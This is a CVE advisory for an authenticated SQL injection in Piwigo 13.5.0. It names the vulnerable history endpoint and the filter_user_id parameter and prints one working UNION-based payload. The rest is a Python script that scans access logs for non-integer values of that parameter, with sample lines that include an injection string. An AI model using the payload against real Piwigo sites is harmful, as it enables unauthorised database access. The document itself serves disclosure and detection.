
CVE-2023-26876: POC - Authenticated SQL injection Piwigo 13.5.0

A SQL injection vulnerability in Piwigo v.13.5.0 and earlier allows a remote attacker to execute arbitrary code via the filter_user_id parameter of the admin.php?page=history&filter_image_id=&filter_user_id endpoint.


POC - Authenticated SQL injection Piwigo 13.5.0

Payload: 12 UNION ALL SELECT CONCAT(0x4141414141,IFNULL(CAST(VERSION() AS NCHAR),0x20),0x4141414141)-- -
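
For defenders, a request of this shape stands out in web server access logs because filter_user_id carries something other than an integer. The following is an added detection example, not code from Piwigo or from the PoC author; the combined log format, the function name suspicious_history_requests and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry (log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"-?\d+")  # assumption: a legitimate user id is a plain integer

def suspicious_history_requests(log_lines):
    """Return (line_number, decoded_value) for admin.php?page=history requests
    whose filter_user_id is non-empty and not a plain integer."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        if not url.path.endswith("/admin.php"):
            continue
        # parse_qs percent-decodes values and turns '+' into a space,
        # so encoded input is compared in its decoded form.
        params = parse_qs(url.query, keep_blank_values=True)
        if "history" not in params.get("page", []):
            continue
        for value in params.get("filter_user_id", []):
            if value.strip() and not INTEGER_RE.fullmatch(value.strip()):
                hits.append((number, value))
    return hits

# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Mar/2023:10:00:01 +0000] "GET /admin.php?page=history&filter_image_id=&filter_user_id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Mar/2023:10:00:09 +0000] "GET /admin.php?page=history&filter_image_id=&filter_user_id=12%20UNION%20ALL%20SELECT%201 HTTP/1.1" 200 5300',
    '203.0.113.7 - - [01/Mar/2023:10:00:15 +0000] "GET /admin.php?page=history&filter_image_id=&filter_user_id= HTTP/1.1" 200 5100',
    '203.0.113.7 - - [01/Mar/2023:10:00:20 +0000] "GET /admin.php?page=photos&filter_user_id=abc HTTP/1.1" 200 4000',
    '203.0.113.7 - - [01/Mar/2023:10:00:25 +0000] "GET /index.php?filter_user_id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value in suspicious_history_requests(SAMPLE_LOG):
        print(f"line {number}: non-integer filter_user_id = {value!r}")
```

Access logs record only the query string, so a parameter sent in a POST body is not visible to this check and needs application-level or WAF logging instead.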

Related news

Piwigo 13.5.0 SQL Injection

Piwigo version 13.5.0 suffers from a remote SQL injection vulnerability.
